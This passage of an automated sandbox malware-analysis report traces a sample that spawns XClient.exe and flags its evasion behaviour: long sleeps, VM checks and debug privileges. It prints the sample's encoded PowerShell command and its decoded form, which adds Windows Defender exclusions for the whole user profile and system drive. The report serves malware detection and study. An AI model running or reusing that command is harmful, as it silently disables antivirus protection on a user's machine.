              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 8E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 1A410000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5967Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2210Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWindow / User API: threadDelayed 7082Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWindow / User API: threadDelayed 2567Jump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeWindow / User API: threadDelayed 9569Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8292Thread sleep time: -36893488147419080s >= -30000sJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100Thread sleep count: 9569 > 30Jump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100Thread sleep time: -826761600000s >= -30000sJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100Thread sleep time: -86399999s >= -30000sJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100Thread sleep count: 144 > 30Jump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe TID: 8100Thread sleep time: -12441600000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 1020Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 8772Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: XClient.exe, 00000003.00000002.3626778140.000000001B440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
              Source: svchost.exe, 00000007.00000002.2859563863.000002CC65E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: svchost.exe, 00000007.00000002.2862716448.000002CC6B45A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Music.UI.exe, 00000004.00000002.3631595501.000002CCD83E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeCode function: 0_2_004014D1 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_004014D1
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Encrypted powershell cmdline option found
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: Base64 decoded <#dfc#>Add-MpPreference <#zby#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nvw#> -Force <#vcn#>
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: Base64 decoded <#dfc#>Add-MpPreference <#zby#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#nvw#> -Force <#vcn#>Jump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="Jump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe" Jump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazgbjacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahoaygb5acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4adgb3acmapgagac0argbvahiaywblacaapaajahyaywbuacmapga="
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqazgbjacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahoaygb5acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4adgb3acmapgagac0argbvahiaywblacaapaajahyaywbuacmapga="Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformationJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbtmp.log VolumeInformationJump to behavior
